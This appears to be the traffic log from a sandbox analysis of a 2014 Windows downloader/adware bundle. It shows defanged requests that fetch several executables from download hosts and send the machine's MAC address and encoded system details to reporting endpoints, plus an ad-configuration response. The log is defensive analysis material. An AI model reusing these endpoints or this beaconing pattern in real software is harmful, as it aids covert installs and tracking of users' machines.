Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 20140918081631105.wangendong.com
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 01 Aug 2014 07:30:54 GMT
Accept-Ranges: bytes
ETag: "22e676875aadcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:17:19 GMT
Content-Length: 2017736
<<< skipped >>>
GET /tjapis.php?mac=000C298A8B37&st=1&exez=tqrl_89_177560.exe&exef=axuls.exe&pass=7a41a5df85b86824a6d2d5418a8cd43e&url1=hXXp://ya.ru/&url2=ya HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: union.yoyolm.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.3.24
Set-Cookie: yuyuapi=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Content-type: text/html
Content-Length: 91
...193.138.244.23125
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
GET /Update.rar HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.yinyue.fm
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 04 Sep 2014 05:13:26 GMT
Accept-Ranges: bytes
ETag: "53e0e0f4fec7cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:18:09 GMT
Connection: keep-alive
Content-Length: 5771.....................khkh...4;*2*2)/.$..1.-<..)..*2*2)/.&.9. ...)..
<<< skipped >>>
GET /link/140896/setup_2948-140896.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: click.t3nlink.com
Connection: Keep-Alive
HTTP/1.1 302 FOUND
Server: nginx/1.0.10
Date: Thu, 18 Sep 2014 00:17:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 303
Location: hXXp://down.yinyue.fm/open/setup_2948-140896.exe
Set-Cookie: gid=4cac5beee6a24f658b915b61dcaaab10; Domain=.jxvector.com; expires=Wed, 13-Sep-2034 08:17:10 GMT; Max-Age=630720000; Path=/
Cache-Control: no-cache
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
CWaueeKey: 1410999430
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="hXXp://down.yinyue.fm/open/setup_2948-140896.exe">hXXp://down.yinyue.fm/open/setup_2948-140896.exe</a>. If not click the link.
GET /ico.ico HTTP/1.0
Host: VVV.meimotuan.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:57 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 18 Jun 2014 06:03:51 GMT
ETag: "e8901-25be-4fc16063d5483"
Accept-Ranges: bytes
Content-Length: 9662
Connection: close
Content-Type: image/vnd.microsoft.icon
<<< skipped >>>
GET /DM15/DMSet.Xml HTTP/1.1
Content-Type: text/html
Host: update.yinyue.fm
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 11 Sep 2014 02:53:27 GMT
Accept-Ranges: bytes
ETag: "331fd48f6bcdcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:18:09 GMT
Content-Length: 5604
GET /stat.htm?id=4327411&r=&lg=en-us&ntime=none&cnzz_eid=921366142-1410999416-&showp=1276x846&t=&h=1&rnd=2115344014 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs2.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Thu, 18 Sep 2014 00:16:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GET /dls/axuls.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 219.239.223.191
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 148992
Content-Type: application/octet-stream
Last-Modified: Tue, 16 Sep 2014 12:45:00 GMT
Accept-Ranges: bytes
ETag: "187b9d7acd1cf1:1cc1"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:35 GMT
GET /dls/axult.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 219.239.223.191
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 144896
Content-Type: application/octet-stream
Last-Modified: Tue, 16 Sep 2014 12:44:57 GMT
Accept-Ranges: bytes
ETag: "586c875acd1cf1:1cc1"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:39 GMT
GET /hzsoft/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 219.239.223.191
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 500680
Content-Type: application/octet-stream
Last-Modified: Fri, 09 May 2014 11:05:43 GMT
Accept-Ranges: bytes
ETag: "f68dc59e766bcf1:1cc1"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:40 GMT
GET /0815/help1.html HTTP/1.0
Host: update.yoyolm.net
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:55 GMT
Content-Length: 538
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 07:24:49 GMT
Connection: Close
ETag: "e47ee24ffcbcf1:676"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: DISK HIT from cnc-sd-153-132.fcd, DISK HIT from ctl-gd-148-147.fcd
GET /client/jstm/1.1.0.0a-zm-157391-v5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tonnn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 930
Connection: keep-alive
Set-Cookie: session=eyJfaWQiOnsiIGIiOiJZekV3TVRrd09EaGhZbVpsTlROaU16RmtOREF3Tm1FMk5tWmpNR1V3WWpBPSJ9fQ.Bvu2PA.34duzsjZLJBfgqJDEuIQuoUIl9U; Domain=.tonnn.com; HttpOnly; Path=/
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
GET /ext/ext.7z HTTP/1.1
User-Agent: Beacon
Host: s.sogv.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:18:23 GMT
Content-Length: 54492
Content-Type: application/octet-stream
Content-Location: hXXp://s.sogv.com/ext/ext.7z
Last-Modified: Sun, 20 Jul 2014 14:08:34 GMT
Accept-Ranges: bytes
ETag: "861c1f1824a4cf1:195f"
Server: NGINX/0.6.39
X-Powered-By: WAF/2.0
GET /dc/run/start/2.0.1.1001/c654925393ae14277410758bb43bb4ec/2561/28/1970-1-1/? HTTP/1.1
Host: appledesktop.sinaapp.com
Connection: Keep-Alive
HTTP/1.1 204 NO CONTENT
Server: nginx/1.4.4
Date: Thu, 18 Sep 2014 00:17:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
via: yq34.pyruntime
Set-Cookie: saeut=CkMPIlQaJJdGuG9OBLGAAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
POST /config/iplocater HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 302 FOUND
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 219
Connection: close
Location: hXXp://API.TUPIAN8.CN/login
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">.<title>Redirecting...</title>.<h1>Redirecting...</h1>.<p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link...
GET /02aab2d719917873b95f7e285991ad620000000000082370/9291/25605/sjss_jing_zhimeng_217.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 183.61.184.37
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 18 Sep 2014 00:17:06 GMT
Content-Type: application/octet-stream
Content-Length: 533360
Last-Modified: Tue, 01 Jul 2014 08:56:31 GMT
Connection: keep-alive
ETag: "53b277bf-82370"
Accept-Ranges: bytes
POST /report/use HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Content-Length: 86
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded
data=pid=juese.exe.sn=juese.exe.mac=000c298a8b37.sign=a258e4f5333f00a2669be0ac6218706d
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2
Connection: close
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
ok
GET /img/pic.gif HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.3.0
Date: Thu, 18 Sep 2014 00:16:57 GMT
Content-Type: image/gif
Content-Length: 719
Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Expires: Fri, 19 Sep 2014 00:16:57 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GET /painter/clb/popup7o.js HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dup.baidustatic.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:00 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Mar 2014 07:44:44 GMT
Transfer-Encoding: chunked
Connection: close
Server: Apache
Expires: Thu, 18 Sep 2014 00:22:00 GMT
Cache-Control: max-age=300
Content-Encoding: gzip
POST /config/juese/adconf HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 606
Connection: close
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
{"lbt": "1800", "dbn": "6", "llt": "10800", "oeu2": "hXXp://s.sogv.com/ext/update.7z", "ldt": "0", "dbs": "1", "dbt": "360", "mdt": "3600", "lbn": "5", "idn": "..netert Hao..23", "udu": "hXXp://VVV.hao123.com/?tn=99283481_hao_pg", "lu": "hXXp://VVV.vool.cn/_right/", "ls": "1", "uds": "1", "ubs": "1", "oes": "1", "oeu": "hXXp://s.sogv.com/ext/ext.7z", "ubn": "6", "udn": "lnetent Haol23", "upu": "hXXp://VVV.hao123.com/?tn=99283481_hao_pg", "ibn": "4", "idu": "hXXp://hao.360.cn/?src=lm&ls=n525187378f", "ids": "1", "st": "1410752066", "mu": "hXXp://VVV.vool.cn/_mini/", "ms": "1", "ibs": "1", "ups": "1"}
GET /index.php?encode=NTSwDwNDg0KlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9kKjUsdW9kKjEwMDgsb3MqV2luZG93cyBYUCxwb2lzb24qLHN0YXTgF1cyoyLGxpc3QqQzpcTgFG9jdW1lbnTgFzIGFuZCBTZXTgF0aW5nc1xhZG1cQXBwbGljYXTgFpb24gTgFGF0YVxBcHBsZUTgFlc2t0b3SwDSwD&process=apples_5_1008.exe HTTP/1.1
Host: inapi.9vh.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
GET /apples_5_1008.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.9vh.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:13 GMT
Content-Type: application/octet-stream
Content-Length: 1515882
Last-Modified: Fri, 05 Sep 2014 05:23:56 GMT
Connection: keep-alive
ETag: "540948ec-17216a"
Accept-Ranges: bytes
GET /index.php?encode=NDk5NjI1KlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9kKjUsdW9kKjEwMDgsb3MqV2luZG93cyBYUCxwb2lzb24qLHN0YXTgF1cyoxLGxpc3QqQzpcTgFG9jdW1lbnTgFzIGFuZCBTZXTgF0aW5nc1xhZG1cQXBwbGljYXTgFpb24gTgFGF0YVxBcHBsZUTgFlc2t0b3SwDSwD&process=apples_5_1008.exe HTTP/1.1
Host: inapi.9vh.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:26 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
GET /upgrade/IFoxInfo.cfg HTTP/1.1
Accept: */*
Host: photocdn.hd.sohu.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 178
Connection: keep-alive
Server: SNS
Date: Wed, 30 Jul 2014 03:53:54 GMT
Last-Modified: Wed, 19 Feb 2014 00:18:01 GMT
Expires: Thu, 30 Jul 2015 03:53:54 GMT
Cache-Control: max-age=31536000
FSS-Cache: HIT from 4070211.6757197.4795244
Accept-Ranges: bytes
[ROOT]
VERSION=4.2.0.88
VALUE= 67240024
URL=hXXp://data.vod.itc.cn/foxd/gz?file=SohuNewPlayer.exe&new=/212/10/LX1gaYhp2TxOw4UbWrnLg7.exe
HASH=65af374a44585e5495d803f6b94cc100
GET /open/setup_2948-140896.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: down.yinyue.fm
HTTP/1.0 200 OK
Date: Thu, 18 Sep 2014 00:17:11 GMT
Content-Type: application/octet-stream
Content-Length: 3879912
Last-Modified: Thu, 18 Sep 2014 00:11:09 GMT
ETag: "541a231d-3b33e8"
Accept-Ranges: bytes
Connection: keep-alive
GET /app.gif?&cna=ehKhDDcf y8CAcGK9OfwIiB HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com
HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 18 Sep 2014 00:17:01 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=ehKhDDcf y8CAcGK9OfwIiB ; expires=Sun, 15-Sep-24 00:17:01 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GET /packages/g_wz/default2/a-zm-157391-v5.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: client-b.jtdichan.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 18 Sep 2014 00:17:47 GMT
Content-Type: application/octet-stream
Content-Length: 1064280
Last-Modified: Wed, 09 Jul 2014 05:13:31 GMT
Connection: keep-alive
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
GET /ecom?di=98364&dcb=BAIDU_DUP_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=4&dai=1&dds=&drs=3&dvi=1410832926&ltu=http://adsvc2.9365.info/ad/softad/popup.htm&liu=&ltr=&lcr=&ps=13x8&psr=1276x846&par=1276x818&pcs=0x0&pss=20x30&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=gb2312&cdo=-1&tsr=172&tlm=1352217204&tcn=1410999396&tpr=1410999395508&dpt=none&coa=&baidu_id= HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cb.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:16:59 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 319
Connection: Keep-Alive
Set-Cookie: BAIDUID=05FFD108C60D2FA03361A7A03E62FD9E:FG=1; expires=Fri, 18-Sep-45 00:16:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Set-Cookie: BAIDUID=; path=/; expires=Thu, 01-Jan-70 00:00:01 GMT
P3P: CP=" OTI DSP COR IVA OUR IND COM "
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu Sep 18 08:16:59 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

BAIDU_DUP_define('request!98364_0',[],{deps:['clb/popup7o'],data:{"id" : "98364","_stype" : 2,"_w" : 350,"_h" : 280,"_type" : "json_html","_html" : "","_fxp" : false,"_sf" : false,"_st" : 0,"_top" : 0,"_left" : 0,"_hs" : 30,"_vs" : 30,"_bf" : true,"_isMlt" : false,"_fr" : false,"_qid" : "68c8e2b1c55c89a3","_v" : 1}});
HEAD /DM15/DMSet.Xml HTTP/1.1
Content-Type: text/html
Host: update.yinyue.fm
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.1 200 OK
Content-Length: 5604
Content-Type: text/xml
Last-Modified: Thu, 11 Sep 2014 02:53:27 GMT
Accept-Ranges: bytes
ETag: "331fd48f6bcdcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:18:02 GMT
GET /9291/15474/setup_2949-14598.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.grandcloud.cn
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.7.2
Date: Thu, 18 Sep 2014 00:17:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 101
Connection: keep-alive
Location: hXXp://175.6.4.178/280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe

<html><head><title>Moved Temporarily</title></head><body><h1>302 Moved Temporarily</h1></body></html>
GET /core.php?web_id=4327411&show=pic&t=z HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 18 Sep 2014 00:16:56 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Thu, 18 Sep 2014 00:16:56 GMT
Expires: Thu, 18 Sep 2014 00:31:56 GMT
GET /count/softcount/?pwc HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 109
Content-Type: text/html
Content-Location: hXXp://adsvc2.9365.info/count/softcount/index.htm
Last-Modified: Tue, 06 Nov 2012 14:53:28 GMT
Accept-Ranges: bytes
ETag: "44c497b2ebccd1:1cc1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:29 GMT

<script src="hXXp://s85.cnzz.com/stat.php?id=4327411&web_id=4327411&show=pic" language="JavaScript"></script>
GET /ad/softad/pwc.htm HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive
Cookie: CNZZDATA4327411=cnzz_eid=921366142-1410999416-&ntime=1410999416
HTTP/1.1 200 OK
Content-Length: 1048
Content-Type: text/html
Last-Modified: Tue, 16 Sep 2014 12:45:51 GMT
Accept-Ranges: bytes
ETag: "f850dd25acd1cf1:1cc1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:35 GMT
GET /2suys_31_1008_01.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.haoie.net
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 18 Sep 2014 00:17:11 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
GET /2suys_31_1008_01.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.haoie.net
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 18 Sep 2014 00:17:12 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
GET /2suys_31_1008_01.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.haoie.net
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 18 Sep 2014 00:17:12 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
POST /config/juese/adconf HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 606
Connection: close
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"

{"lbt": "1800", "dbn": "6", "llt": "10800", "oeu2": "hXXp://s.sogv.com/ext/update.7z", "ldt": "0", "dbs": "1", "dbt": "360", "mdt": "3600", "lbn": "5", "idn": "..netert Hao..23", "udu": "hXXp://VVV.hao123.com/?tn=99283481_hao_pg", "lu": "hXXp://VVV.vool.cn/_right/", "ls": "1", "uds": "1", "ubs": "1", "oes": "1", "oeu": "hXXp://s.sogv.com/ext/ext.7z", "ubn": "6", "udn": "lnetent Haol23", "upu": "hXXp://VVV.hao123.com/?tn=99283481_hao_pg", "ibn": "4", "idu": "hXXp://hao.360.cn/?src=lm&ls=n525187378f", "ids": "1", "st": "1410752066", "mu": "hXXp://VVV.vool.cn/_mini/", "ms": "1", "ibs": "1", "ups": "1"}
GET /js/s.js HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cbjs.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:16:56 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 16 Sep 2014 02:35:58 GMT
Transfer-Encoding: chunked
Connection: close
Server: Apache
Expires: Thu, 18 Sep 2014 00:21:56 GMT
Cache-Control: max-age=300
Content-Encoding: gzip
The Dropped connects to the servers at the following location(s):
axuls.exe_1160:
axult.exe_460:
IFoxInstall-y-c203945859-run-s-x.exe_1360:
sjss_jing_zhimeng_217.exe_1724:
sjss.exe_216:
AppleDesktop.exe_1952:
fm4.exe_260:
&password=
hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&user_id=
hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&type=
hXXp://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?out=json&value=
"msg":
_0.jpg
hXXp://imgcache.qq.com/music/photo/album/
hXXp://music.qq.com/miniportal/static/lyric/
